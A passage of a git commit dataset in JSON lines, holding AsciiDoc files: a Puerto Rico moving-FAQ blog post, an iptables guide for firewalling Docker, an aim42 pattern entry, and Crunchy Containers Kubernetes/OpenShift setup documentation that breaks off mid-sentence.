<template-path>\/{PRODUCT_INIT}{ENTERPRISE_VERSION_SHORT}-trial-ephemeral.yaml \n----\n+\nIn this command line, replace `<template-path>` with the path to the downloaded template file.\n. Optionally, set any parameters as described in the template. However, a typical trial deployment does not require any parameters.\n. 
Complete the creation of the environment, depending on the method that you are using:\n* In the OpenShift Web UI, click *Create*.\n* Complete and run the command line.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da9cedb44896f3dcd314f7752890a1d62eb9730a","subject":"Update 2015-07-08-Preguntas-preguntas-preguntas.adoc","message":"Update 2015-07-08-Preguntas-preguntas-preguntas.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-07-08-Preguntas-preguntas-preguntas.adoc","new_file":"_posts\/2015-07-08-Preguntas-preguntas-preguntas.adoc","new_contents":"= Preguntas, preguntas, preguntas\u2026\n:hp-image: IMG_0606.jpg\n\nWe\u2019re in our final days of living stateside. Technically we\u2019re homeless but the wonderful community of family and friends we have has allowed us to couch surf until we take off to PR. Backyard BBQ\u2019s and lazy summer days with family and friends only continue to confirm the fact that we are so fortunate to be able to have this opportunity to pick up and go. We hope to have many more of these enjoyable days as our mainland connections come visit us on the island of enchantment.\n\nWe\u2019ve been getting a lot of questions about the island, our intentions while there, and our feelings about going - considering how much the 2 of us have moved over the past 6 years this sort of move isn\u2019t all that daunting to us, but I can see how it might be from a less nomadic person\u2019s perspective. Below I\u2019ve attempted to answer some of the more common questions we\u2019ve gotten over the last few weeks and some we\u2019ve had to really think to answer ourselves. \n\n - *Do you need a passport to go?* Only if you\u2019re not a US Citizen or if you\u2019re flying in from another country. US Citizens or flights from within the US don\u2019t have any customs requirements to visit Puerto Rico as it is a US Territory.\n\n - *Do you need to apply to live or work in Puerto Rico?* Again, if you\u2019re a US Citizen, nope! Moving to PR is just like moving to any other state. The difference for work is the income tax you pay. Because Puerto Rico doesn\u2019t have official representation in the US Congress, Puerto Rican residents are not subject to federal income tax. With that said, we\u2019ll be consulting a CPA to make sure we file correctly next year since we\u2019ll have lived half this year in the states and Alejandro will be working as an independent contractor.\n\n - *What is the closest mainland state to PR?* Puerto Rico is about 1000 miles or a 2.5 hr flight from Miami. The island is situated at the point where the Caribbean and Atlantic Ocean meet. The closest island nation is the Dominican Republic.\n\n- *Can you get all the essentials and comforts of home?* Like anywhere, Puerto Rico has metropolitan areas and rural areas. With the island being only 100 miles long by 35 miles wide, all of these areas are within a day\u2019s drive. Our initial home, in Carolina, is within the San Juan metropolitan area and is very close to many shopping areas and stores including Bed Bath and Beyond, Walgreens, CVS, Dave\u2019s Famous BBQ, Walmart, and Costco. Since we are big proponents of supporting the local community we are very excited to try local varieties of fruits, vegetables, and meats. I\u2019ve already researched the farmers markets and fish mongers in the area. 
If you\u2019re interested here are some I plan on exploring initially - http:\/\/www.puertoricodaytrips.com\/rio-piedras-market\/[Rio Piedras Farmer\u2019s Market] and http:\/\/www.marisqueriaatlantica.com\/marisqueria.php?id=2[Marqueseria Atlantica]. I\u2019m sure once we\u2019re on the ground we\u2019ll find more places to explore\u2026we\u2019ll keep you up to date on what we find. Where Alejandro\u2019s family property is, in Rincon, is a little more rural. Think beach\/farm community with a small downtown and no traffic signals. There we will have smaller grocers and stores but there is still a farmers market, an organic grocery store, a local hardware store and Mayaguez is a city of about 85,000 and about a 45 minute drive away (without traffic).\n\n- *Is it safe?* Like anywhere else, there are pockets of the metropolitan areas you should be vigilant in and be aware of your surroundings, but its not unlike being in any other metropolitan area. Crime varies from city to city just like it does on the mainland and occurs with less frequency in the rural areas.\n\n- *Do you have to know Spanish?* Knowing Spanish is not a necessity to get around in Puerto Rico but learning it will help you tremendously if you plan on living there. Many Puerto Ricans speak english to one degree or another. I\u2019m using Duolingo to improve upon my Spanish and luckily Alejandro is fluent.\n\n - *Are you anxious about going?* While I\u2019m anxious to get *TO* Puerto Rico and not be living out of my backpack I don\u2019t have any anxiety about going. I\u2019m excited for the new adventure that awaits us and I\u2019m truly looking forward to soaking up the sun and seeing what path we will end up on. Excitement yes, anxiety no.\n\n - *What are you going to do?* This is a question that really has no answer. I plan on exploring, learning the culture, the environment, and the people. I\u2019ve been doing a lot of research on the various environmental programs happening throughout the island and hope to be able to get involved with some of these groups. We will also be assessing the work that needs to be done on the property, meeting with lawyers, submitting necessary paperwork for the property and enjoying the occasional coconut. \n\n - *Can you find sushi?* Yes! Don\u2019t worry, we will research and report back and will have recommendations for those that visit.\n\n- *Where is all your stuff?* We\u2019ve managed to consolidate or sell most of our stuff. Many of our friends have been the lucky recipients of kitchenware, plants, baking items, furniture, and even clothes. The things we did keep (nicer kitchen items, mementos, records, a few pieces of furniture) have been packed up and are in my mom\u2019s garage. Depending on where we end up or how long we stay here will determine when we reunite with these possessions. For now, we\u2019re taking 5 suitcases and 2 backpacks that contain mostly clothes and essentials. Even though we move pretty often, we\u2019d been in our apartment a year and half and its amazing how much you collect in a short period of time. Even just the amount of change we found throughout the house was incredible! Note - most banks won\u2019t take loose change and some won\u2019t even take rolled change\u2026we had to settle for Coinstar taking their 10%\u2026\n\n.Our Puerto Rico Baggage\nimage:IMG_0607.jpg[Puerto Rico Baggage]\n\n - *How will you get around?* This is mostly a question we get from our San Francisco friends. 
We haven\u2019t owned a car in years since we never needed one in the city. We\u2019ll be renting a car using our airline mile points for about a week and we have already searched online for some possible locations to buy a car when we get to PR. \n\n - *Will your phone work there?* Yep! Cell phone use in Puerto Rico is the same as if you\u2019re in the mainland. Our phone numbers will remain the same and we hope to continue getting phone calls and text messages from everyone!\n\n- *What\u2019s the weather like?* Puerto Rico has some of the most consistent temperatures year round with highs staying in the upper 80\u2019s and lows in the mid 70\u2019s. Hurricane season ranges from August through October with a major hurricane gracing the island around every 7 years. \n\n - *What clothes did you pack?* This was a pretty difficult question for me to answer while I was going through my clothes. Being used to summers in San Francisco its was very difficult for me to part with my summer sweaters and jackets. I gave away a lot, packed a few in storage, and brought a couple that I just couldn\u2019t part with. Taking a sweater everywhere I go is going to be hard to give up initially but I\u2019m sure I\u2019ll acclimate to island temperature very quickly. For the most part my suitcases are filled with shorts, t-shirts, tank tops, skirts, and dresses - pretty much the items I only got to wear on occasion in San Francisco.\n\n- *What has been the hardest part of this move?* This is a loaded question. Leaving our friends and family that we see on a regular basis will definitely be the most difficult. In terms of practical changes we\u2019ve had to make I could say deciding which clothes and household items to keep and what to give away; I could say all the trips to Goodwill when our things wouldn\u2019t sell on Craigslist\u2026but the most difficult moving task we\u2019ve faced is changing our address! Addresses in Puerto Rico are often very different than here in the states, with your address being a kilometer distance on a particular road in a barrio within a city. Even putting in a request for a change of address with USPS proved challenging. We\u2019ve had to call pretty much every vendor we have bills with to change our address and even had to close a few accounts that won\u2019t accept an address outside the 50 states. Some changes will have to wait until we have a PO Box in Puerto Rico that we can use as an address since our kilometer number doesn\u2019t work for some businesses. For those of you wanting to send mail, we\u2019ll update you with our PO Box information once we have it.\n\n- *Will you miss San Francisco?* Absolutely!! SF has been my home for many years and will always be one of my favorite cities. I have wonderful friends and great memories of the bay area and will always consider it a part of me. We might live there again, we might not, but we will always return for visits.\n\nI fully expect questions from ourselves, from family & friends to never end during this adventure and indeed I welcome them. If you are curious about anything related to Puerto Rico or our move in general don\u2019t hesitate to ask us in the comments and we\u2019ll try to answer as best we can. Hopefully as we discover Puerto Rico we\u2019ll be able to answer a lot more questions and we\u2019ll definitely keep you all informed of what we learn!\n\n","old_contents":"= Preguntas, preguntas, preguntas\u2026\n:hp image:IMG_0606.jpg\n\nWe\u2019re in our final days of living stateside. 
Technically we\u2019re homeless but the wonderful community of family and friends we have has allowed us to couch surf until we take off to PR. Backyard BBQ\u2019s and lazy summer days with family and friends only continue to confirm the fact that we are so fortunate to be able to have this opportunity to pick up and go. We hope to have many more of these enjoyable days as our mainland connections come visit us on the island of enchantment.\n\nWe\u2019ve been getting a lot of questions about the island, our intentions while there, and our feelings about going - considering how much the 2 of us have moved over the past 6 years this sort of move isn\u2019t all that daunting to us, but I can see how it might be from a less nomadic person\u2019s perspective. Below I\u2019ve attempted to answer some of the more common questions we\u2019ve gotten over the last few weeks and some we\u2019ve had to really think to answer ourselves. \n\n - *Do you need a passport to go?* Only if you\u2019re not a US Citizen or if you\u2019re flying in from another country. US Citizens or flights from within the US don\u2019t have any customs requirements to visit Puerto Rico as it is a US Territory.\n\n - *Do you need to apply to live or work in Puerto Rico?* Again, if you\u2019re a US Citizen, nope! Moving to PR is just like moving to any other state. The difference for work is the income tax you pay. Because Puerto Rico doesn\u2019t have official representation in the US Congress, Puerto Rican residents are not subject to federal income tax. With that said, we\u2019ll be consulting a CPA to make sure we file correctly next year since we\u2019ll have lived half this year in the states and Alejandro will be working as an independent contractor.\n\n - *What is the closest mainland state to PR?* Puerto Rico is about 1000 miles or a 2.5 hr flight from Miami. The island is situated at the point where the Caribbean and Atlantic Ocean meet. The closest island nation is the Dominican Republic.\n\n- *Can you get all the essentials and comforts of home?* Like anywhere, Puerto Rico has metropolitan areas and rural areas. With the island being only 100 miles long by 35 miles wide, all of these areas are within a day\u2019s drive. Our initial home, in Carolina, is within the San Juan metropolitan area and is very close to many shopping areas and stores including Bed Bath and Beyond, Walgreens, CVS, Dave\u2019s Famous BBQ, Walmart, and Costco. Since we are big proponents of supporting the local community we are very excited to try local varieties of fruits, vegetables, and meats. I\u2019ve already researched the farmers markets and fish mongers in the area. If you\u2019re interested here are some I plan on exploring initially - http:\/\/www.puertoricodaytrips.com\/rio-piedras-market\/[Rio Piedras Farmer\u2019s Market] and http:\/\/www.marisqueriaatlantica.com\/marisqueria.php?id=2[Marqueseria Atlantica]. I\u2019m sure once we\u2019re on the ground we\u2019ll find more places to explore\u2026we\u2019ll keep you up to date on what we find. Where Alejandro\u2019s family property is, in Rincon, is a little more rural. Think beach\/farm community with a small downtown and no traffic signals. 
There we will have smaller grocers and stores but there is still a farmers market, an organic grocery store, a local hardware store and Mayaguez is a city of about 85,000 and about a 45 minute drive away (without traffic).\n\n- *Is it safe?* Like anywhere else, there are pockets of the metropolitan areas you should be vigilant in and be aware of your surroundings, but its not unlike being in any other metropolitan area. Crime varies from city to city just like it does on the mainland and occurs with less frequency in the rural areas.\n\n- *Do you have to know Spanish?* Knowing Spanish is not a necessity to get around in Puerto Rico but learning it will help you tremendously if you plan on living there. Many Puerto Ricans speak english to one degree or another. I\u2019m using Duolingo to improve upon my Spanish and luckily Alejandro is fluent.\n\n - *Are you anxious about going?* While I\u2019m anxious to get *TO* Puerto Rico and not be living out of my backpack I don\u2019t have any anxiety about going. I\u2019m excited for the new adventure that awaits us and I\u2019m truly looking forward to soaking up the sun and seeing what path we will end up on. Excitement yes, anxiety no.\n\n - *What are you going to do?* This is a question that really has no answer. I plan on exploring, learning the culture, the environment, and the people. I\u2019ve been doing a lot of research on the various environmental programs happening throughout the island and hope to be able to get involved with some of these groups. We will also be assessing the work that needs to be done on the property, meeting with lawyers, submitting necessary paperwork for the property and enjoying the occasional coconut. \n\n - *Can you find sushi?* Yes! Don\u2019t worry, we will research and report back and will have recommendations for those that visit.\n\n- *Where is all your stuff?* We\u2019ve managed to consolidate or sell most of our stuff. Many of our friends have been the lucky recipients of kitchenware, plants, baking items, furniture, and even clothes. The things we did keep (nicer kitchen items, mementos, records, a few pieces of furniture) have been packed up and are in my mom\u2019s garage. Depending on where we end up or how long we stay here will determine when we reunite with these possessions. For now, we\u2019re taking 5 suitcases and 2 backpacks that contain mostly clothes and essentials. Even though we move pretty often, we\u2019d been in our apartment a year and half and its amazing how much you collect in a short period of time. Even just the amount of change we found throughout the house was incredible! Note - most banks won\u2019t take loose change and some won\u2019t even take rolled change\u2026we had to settle for Coinstar taking their 10%\u2026\n\n.Our Puerto Rico Baggage\nimage:IMG_0607.jpg[Puerto Rico Baggage]\n\n - *How will you get around?* This is mostly a question we get from our San Francisco friends. We haven\u2019t owned a car in years since we never needed one in the city. We\u2019ll be renting a car using our airline mile points for about a week and we have already searched online for some possible locations to buy a car when we get to PR. \n\n - *Will your phone work there?* Yep! Cell phone use in Puerto Rico is the same as if you\u2019re in the mainland. 
Our phone numbers will remain the same and we hope to continue getting phone calls and text messages from everyone!\n\n- *What\u2019s the weather like?* Puerto Rico has some of the most consistent temperatures year round with highs staying in the upper 80\u2019s and lows in the mid 70\u2019s. Hurricane season ranges from August through October with a major hurricane gracing the island around every 7 years. \n\n - *What clothes did you pack?* This was a pretty difficult question for me to answer while I was going through my clothes. Being used to summers in San Francisco its was very difficult for me to part with my summer sweaters and jackets. I gave away a lot, packed a few in storage, and brought a couple that I just couldn\u2019t part with. Taking a sweater everywhere I go is going to be hard to give up initially but I\u2019m sure I\u2019ll acclimate to island temperature very quickly. For the most part my suitcases are filled with shorts, t-shirts, tank tops, skirts, and dresses - pretty much the items I only got to wear on occasion in San Francisco.\n\n- *What has been the hardest part of this move?* This is a loaded question. Leaving our friends and family that we see on a regular basis will definitely be the most difficult. In terms of practical changes we\u2019ve had to make I could say deciding which clothes and household items to keep and what to give away; I could say all the trips to Goodwill when our things wouldn\u2019t sell on Craigslist\u2026but the most difficult moving task we\u2019ve faced is changing our address! Addresses in Puerto Rico are often very different than here in the states, with your address being a kilometer distance on a particular road in a barrio within a city. Even putting in a request for a change of address with USPS proved challenging. We\u2019ve had to call pretty much every vendor we have bills with to change our address and even had to close a few accounts that won\u2019t accept an address outside the 50 states. Some changes will have to wait until we have a PO Box in Puerto Rico that we can use as an address since our kilometer number doesn\u2019t work for some businesses. For those of you wanting to send mail, we\u2019ll update you with our PO Box information once we have it.\n\n- *Will you miss San Francisco?* Absolutely!! SF has been my home for many years and will always be one of my favorite cities. I have wonderful friends and great memories of the bay area and will always consider it a part of me. We might live there again, we might not, but we will always return for visits.\n\nI fully expect questions from ourselves, from family & friends to never end during this adventure and indeed I welcome them. If you are curious about anything related to Puerto Rico or our move in general don\u2019t hesitate to ask us in the comments and we\u2019ll try to answer as best we can. 
Hopefully as we discover Puerto Rico we\u2019ll be able to answer a lot more questions and we\u2019ll definitely keep you all informed of what we learn!\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"7c949300c479dc502e9cbf0496a6a416eec2977a","subject":"Update 2017-12-07-Firewall-Docker-with-Iptables.adoc","message":"Update 2017-12-07-Firewall-Docker-with-Iptables.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2017-12-07-Firewall-Docker-with-Iptables.adoc","new_file":"_posts\/2017-12-07-Firewall-Docker-with-Iptables.adoc","new_contents":"= Firewall Docker with Iptables\n\n\n[source, bash]\n--------------------------------------------------\n# New intercept chain\niptables -N PRE_DOCKER\n# Jump to intercept chain\niptables -I FORWARD -j PRE_DOCKER\n# Logging for debug (see below)\n# iptables -A PRE_DOCKER -j LOG\n# Return from where we jump if it is an IP we trust (replace 256 with an IP you trust)\niptables -A PRE_DOCKER -s 256.256.256.256\/32 -i eth0 -j RETURN\n# Drop it by default\niptables -A PRE_DOCKER -i eth0 -j DROP\n--------------------------------------------------\n\nThe finish iptables rules (`iptables -S`) would look like\n\n[source, iptables]\n--------------------------------------------------\nsome -P here...\n-N DOCKER\n-N DOCKER-INGRESS\n-N DOCKER-ISOLATION\n-N DOCKER-USER\n-N PRE_DOCKER\n-A FORWARD -j PRE_DOCKER\n-A FORWARD -j DOCKER-USER\n-A FORWARD -j DOCKER-INGRESS\n-A FORWARD -j DOCKER-ISOLATION\n-A FORWARD -o docker_gwbridge -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT\n-A FORWARD -o docker_gwbridge -j DOCKER\n-A FORWARD -i docker_gwbridge ! -o docker_gwbridge -j ACCEPT\n-A FORWARD -o docker0 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT\n-A FORWARD -o docker0 -j DOCKER\n-A FORWARD -i docker0 ! 
-o docker0 -j ACCEPT\n-A FORWARD -i docker0 -o docker0 -j ACCEPT\n-A FORWARD -i docker_gwbridge -o docker_gwbridge -j DROP\nsome -A DOCKER-* here...\n-A PRE_DOCKER -j LOG\n-A PRE_DOCKER -s 256.256.256.256\/32 -i eth0 -j RETURN\n-A PRE_DOCKER -i eth0 -j DROP\n--------------------------------------------------\n\nif `-A PRE_DOCKER -j LOG` is there, you would find the log in `\/var\/log\/syslog` that explain the need of `-i eth0` and `-i docker0`\n\n[source, iptables]\n--------------------------------------------------\nDec 7 16:14:23 ds06 kernel: [164304.277225] IN=eth0 OUT=docker0 MAC= SRC=A DST=B LEN=64 TOS=0x00 PREC=0x00 TTL=47 ID=34183 DF PROTO=TCP SPT=61065 DPT=7200 WINDOW=65535 RES=0x00 SYN URGP=0\nDec 7 16:14:23 ds06 kernel: [164304.277307] IN=docker0 OUT=eth0 PHYSIN=veth730785d MAC= SRC=B DST=A LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=7200 DPT=61065 WINDOW=28960 RES=0x00 ACK SYN URGP=0\n--------------------------------------------------\n\n\n\nhttps:\/\/wiki.centos.org\/HowTos\/Network\/IPTables\nhttps:\/\/forums.docker.com\/t\/restricting-external-container-access-with-iptables\/2225\/4\n\n","old_contents":"= Firewall Docker with Iptables\n\n\n[source, bash]\n--------------------------------------------------\n# New intercept chain\niptables -N PRE_DOCKER\n# Jump to intercept chain\niptables -I FORWARD -j PRE_DOCKER\n# Logging for debug (see below)\n# iptables -A PRE_DOCKER -j LOG\n# Return from where we jump if it is an IP we trust (replace 256 with an IP you trust)\niptables -A PRE_DOCKER -s 256.256.256.256\/32 -i eth0 -j RETURN\n# Drop it by default\niptables -A PRE_DOCKER -i eth0 -j DROP\n--------------------------------------------------\n\nThe finish iptables rules (`iptables -S`) would look like\n\n[source, iptables]\n--------------------------------------------------\nsome -P here...\n-N DOCKER\n-N DOCKER-INGRESS\n-N DOCKER-ISOLATION\n-N DOCKER-USER\n-N PRE_DOCKER\n-A FORWARD -j PRE_DOCKER\n-A FORWARD -j DOCKER-USER\n-A FORWARD -j DOCKER-INGRESS\n-A FORWARD -j DOCKER-ISOLATION\n-A FORWARD -o docker_gwbridge -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT\n-A FORWARD -o docker_gwbridge -j DOCKER\n-A FORWARD -i docker_gwbridge ! -o docker_gwbridge -j ACCEPT\n-A FORWARD -o docker0 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT\n-A FORWARD -o docker0 -j DOCKER\n-A FORWARD -i docker0 ! 
-o docker0 -j ACCEPT\n-A FORWARD -i docker0 -o docker0 -j ACCEPT\n-A FORWARD -i docker_gwbridge -o docker_gwbridge -j DROP\nsome -A DOCKER-* here...\n-A PRE_DOCKER -s 256.256.256.256\/32 -i eth0 -j RETURN\n-A PRE_DOCKER -j LOG\n-A PRE_DOCKER -s 87.224.30.70\/32 -i docker0 -j RETURN\n-A PRE_DOCKER -i eth0 -j DROP\n--------------------------------------------------\n\nhttps:\/\/wiki.centos.org\/HowTos\/Network\/IPTables\nhttps:\/\/forums.docker.com\/t\/restricting-external-container-access-with-iptables\/2225\/4\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"5330911eee0eae196b879525e2ef6d1a11fbc7dd","subject":"updated plan-improvement","message":"updated plan-improvement\n","repos":"aim42\/aim42,rschimmack\/aim42,kitenco\/aim42,rschimmack\/aim42,feststelltaste\/aim42,feststelltaste\/aim42,aim42\/aim42,kitenco\/aim42","old_file":"src\/main\/asciidoc\/patterns\/crosscutting\/crosscutting-patterns-complete\/plan-improvement.adoc","new_file":"src\/main\/asciidoc\/patterns\/crosscutting\/crosscutting-patterns-complete\/plan-improvement.adoc","new_contents":"\n[[Plan-Improvements]]\n=== [pattern]#Plan Improvements#\nConduct long- and short-term planning of improvement activities. Balance\nor align issues and improvements, considering existing goals and constraints.\n\nConsists of long-term decisions (concerning <<Improvement-Approaches>>) and\nshort-term planning.","old_contents":"\n[[Plan-Improvements]]\n=== [pattern]#Plan Improvements#\nConduct long- and short-term planning of improvement activities. Balance\nor align issues and improvements, considering existing goals and constraints.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c8c377f4628ed03fad534ef1e15c0644fa5acf5","subject":"Added default credentials for Grafana.","message":"Added default credentials for Grafana.\n","repos":"the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,the1forte\/crunchy-containers","old_file":"hugo\/content\/getting-started\/kubernetes-and-openshift\/_index.adoc","new_file":"hugo\/content\/getting-started\/kubernetes-and-openshift\/_index.adoc","new_contents":"---\ntitle: \"Kubernetes and Openshift\"\ndate: 2018-05-15T08:30:41-07:00\ndraft: false\n---\n\n:toc:\nLatest Release: 2.2.0 {docdate}\n\n== Getting Started\n\n{{% notice warning %}}\nThe Kubernetes and OpenShift examples provided on this page have been designed using single-node Kubernetes\/OCP clusters\nwhose host machines provide any required supporting infrastructure or services (e.g. local hostPath storage or access\nto an NFS share). Therefore, for the best results when running these examples, it is recommended that you utilize a \nsingle-node architecture as well.\n{{% \/notice %}}\n\n{{% notice tip %}}\nThe examples located in the *kube* directory work on both Kubernetes and OpenShift. 
Ensure the `CCP_CLI` environment variable\nis set to the correct binary for your environment.\n{{% \/notice %}}\n\nSet the environment variable in `.bashrc` to ensure the examples will work in your environment.\n....\n# Kubernetes\nexport CCP_CLI=kubectl\n\n# OpenShift\nexport CCP_CLI=oc\n....\n\nHere are some useful resources for finding the right commands to troubleshoot & modify containers in\nthe various environments shown in this guide:\n\n* link:http:\/\/www.bogotobogo.com\/DevOps\/Docker\/Docker-Cheat-Sheet.php[Docker Cheat Sheet]\n* link:https:\/\/kubernetes.io\/docs\/user-guide\/kubectl-cheatsheet\/[Kubectl Cheat Sheet]\n* link:https:\/\/github.com\/nekop\/openshift-sandbox\/blob\/master\/docs\/command-cheatsheet.md[OpenShift Cheat Sheet]\n* link:https:\/\/github.com\/kubernetes\/helm\/blob\/master\/docs\/using_helm.md[Helm Cheat Sheet]\n\n== Example Conventions\n\nThe examples provided in Container Suite are simple examples that\nare meant to demonstrate key Container Suite features. These\nexamples can be used to build more production level deployments\nas dictated by user requirements specific to their operating\nenvironments.\n\nThe examples generally follow these conventions:\n\n * There is a *run.sh* script that you will execute to start the example.\n * There is a *cleanup.sh* script that you will execute to shutdown and cleanup the example.\n * Each example will create resources such as Secrets, ConfigMaps, Services, and PersistentVolumeClaims, all which follow a naming convention of *<example name>-<optional description suffix>*. For example an example called *primary* might have a PersistentVolumeClaim called *primary-pgconf* to describe the purpose of that particular PVC.\n * The folder names for each example give a clue as to which Container Suite feature it demonstrates. For instance, the *examples\/kube\/pgaudit* example demonstrates how to enable the pg_audit capability of the crunchy-postgres container.\n\n== Administration\n\n=== Password Management\n\nThe passwords used for the PostgreSQL user accounts are generated\nby the OpenShift `process` command. To inspect what value is\nsupplied, you can inspect the primary pod as follows:\n\n....\n${CCP_CLI} get pod pr-primary -o json | grep -C 1 'PG_USER\\|PG_PASSWORD\\|PG_DATABASE'\n....\n\nThis will give you the environment variable values for the database created by default\nin addition to the username and password of the standard user.\n\n * `PG_USER`\n * `PG_PASSWORD`\n * `PG_DATABASE`\n\n=== Kubernetes Secrets\n\nYou can use Kubernetes Secrets to set and maintain your database\ncredentials. Secrets requires you base64 encode your user and password\nvalues as follows:\n....\necho -n 'myuserid' | base64\n....\n\nYou will paste these values into your JSON secrets files for values.\n\nThis example allows you to set the PostgreSQL passwords\nusing Kubernetes Secrets.\n\nThe secret uses a base64 encoded string to represent the\nvalues to be read by the container during initialization. The\nencoded password value is *password*. Run the example\nas follows:\n\n....\ncd $CCPROOT\/examples\/kube\/secret\n.\/run.sh\n....\n\nThe secrets are mounted in the `\/pguser`, `\/pgprimary`, and `\/pgroot` volumes within the\ncontainer and read during initialization. 
The container\nscripts create a PostgreSQL user with those values, and sets the passwords\nfor the primary user and PostgreSQL superuser using the mounted secret volumes.\n\nWhen using secrets, you do *NOT* have to specify the following\nenvironment variables if you specify all three secrets volumes:\n\n * `PG_USER`\n * `PG_PASSWORD`\n * `PG_ROOT_PASSWORD`\n * `PG_PRIMARY_USER`\n * `PG_PRIMARY_PASSWORD`\n\nYou can test the container as follows. In all cases, the password is *password*:\n....\npsql -h secret -U pguser1 postgres\npsql -h secret -U postgres postgres\npsql -h secret -U primaryuser postgres\n....\n\n=== pgAdmin4\n\nThis example deploys the pgadmin4 v2 web user interface\nfor PostgreSQL without TLS.\n\nAfter running the example, you should be able to browse to http:\/\/127.0.0.1:5050\nand log into the web application with the following configured credentials:\n\n * Username : *admin@admin.com*\n * Password: *password*\n\nIf you are running this example using Kubernetes or\nOpenShift, it is required to use a port-forward proxy to access the dashboard.\n\nTo start the port-forward proxy run the following:\n\n....\n${CCP_CLI} port-forward pgadmin4-http 5050:5050\n....\n\nTo access the pgAdmin4 dashboard through the proxy, navigate to *http:\/\/127.0.0.1:5050*\nin a browser.\n\nSee the link:http:\/\/pgadmin.org[pgAdmin4 documentation] for more details.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo run this example, run the following:\n....\ncd $CCPROOT\/examples\/docker\/pgadmin4-http\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nStart the container as follows:\n....\ncd $CCPROOT\/examples\/kube\/pgadmin4-http\n.\/run.sh\n....\n\n{{% notice tip %}}\nAn emptyDir with write access must be mounted to the `\/run\/httpd` directory in OpenShift.\n{{% \/notice %}}\n\n=== pgAdmin4 with TLS\n\nThis example deploys the pgadmin4 v2 web user interface\nfor PostgreSQL with TLS.\n\nAfter running the example, you should be able to browse to https:\/\/127.0.0.1:5050\nand log into the web application with the following configured credentials:\n\n * Username : *admin@admin.com*\n * Password: *password*\n\nIf you are running this example using Kubernetes or\nOpenShift, it is required to use a port-forward proxy to access the dashboard.\n\nTo start the port-forward proxy run the following:\n\n....\n${CCP_CLI} port-forward pgadmin4-https 5050:5050\n....\n\nTo access the pgAdmin4 dashboard through the proxy, navigate to *https:\/\/127.0.0.1:5050*\nin a browser.\n\nSee the link:http:\/\/pgadmin.org[pgadmin4 documentation] for more details.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo run this example, run the following:\n....\ncd $CCPROOT\/examples\/docker\/pgadmin4-https\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nStart the container as follows:\n....\ncd $CCPROOT\/examples\/kube\/pgadmin4-https\n.\/run.sh\n....\n\n{{% notice tip %}}\nAn emptyDir with write access must be mounted to the `\/run\/httpd` directory in OpenShift.\n{{% \/notice %}}\n\n=== Upgrade\n\n{{% notice tip %}}\nThis example assumes you have run *primary* using a PG 9.5 or 9.6 image\nsuch as `centos7-9.5.14-2.2.0` prior to running this upgrade.\n{{% \/notice %}}\n\nStarting in release 1.3.1, the upgrade container will let\nyou perform a `pg_upgrade` either from a PostgreSQL version 9.5 database to\n9.6 or from 9.6 to 10.\n\nPrior to 
running this example, make sure your `CCP_IMAGE_TAG`\nenvironment variable is using the next major version of PostgreSQL that you\nwant to upgrade to. For example, if you're upgrading from 9.5 to 9.6, make\nsure the variable references a PG 9.6 image such as `centos7-9.6.10-2.2.0`.\n\nThis will create the following in your Kubernetes environment:\n\n * a Kubernetes Job running the *crunchy-upgrade* container\n * a new data directory name *upgrade* found in the *pgnewdata* PVC\n\n{{% notice tip %}}\nData checksums on the Crunchy PostgreSQL container were enabled by default in version 2.1.0.\nWhen trying to upgrade, it's required that both the old database and the new database\nhave the same data checksums setting. Prior to upgrade, check if `data_checksums`\nwere enabled on the database by running the following SQL: `SHOW data_checksums`\n{{% \/notice %}}\n\n==== Kubernetes and OpenShift\n\n{{% notice tip %}}\nBefore running the example, ensure you edit `upgrade.json` and update the `OLD_VERSION`\nand `NEW_VERSION` parameters to the ones relevant to your situation.\n{{% \/notice %}}\n\nStart the upgrade as follows:\n....\ncd $CCPROOT\/examples\/kube\/upgrade\n.\/run.sh\n....\n\nIf successful, the Job will end with a **successful** status. Verify\nthe results of the Job by examining the Job's pod log:\n....\n${CCP_CLI} get pod -l job-name=upgrade\n${CCP_CLI} logs -l job-name=upgrade\n....\n\nYou can verify the upgraded database by running the `post-upgrade.sh` script in the\n`examples\/kube\/upgrade` directory. This will create a PostgreSQL pod that mounts the\nupgraded volume.\n\n=== Crunchy Scheduler\n\nThe Crunchy Scheduler container implements a cronlike microservice within a namespace\nto automate backups of a PostgreSQL database.\n\nCurrently Crunchy Scheduler only supports two types of tasks:\n\n* pgBackRest\n* pgBaseBackup\n\nThis service watches Kubernetes for config maps with the label `crunchy-scheduler=true`.\nIf found the scheduler will parse the data found in the config map (json object) and\nconvert it to a scheduled task. If the config map is removed, the scheduler will\ndelete the task.\n\nSee the following examples for creating config maps that Crunchy Scheduler can parse:\n\n* link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/configs\/schedule-backrest-diff.json[pgBackRest Diff Backup]\n* link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/configs\/schedule-backrest-full.json[pgBackRest Full Backup]\n* link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/configs\/schedule-pgbasebackup.json[pgBaseBackup Backup]\n\nThe Crunchy Scheduler requires a Service Account to create jobs 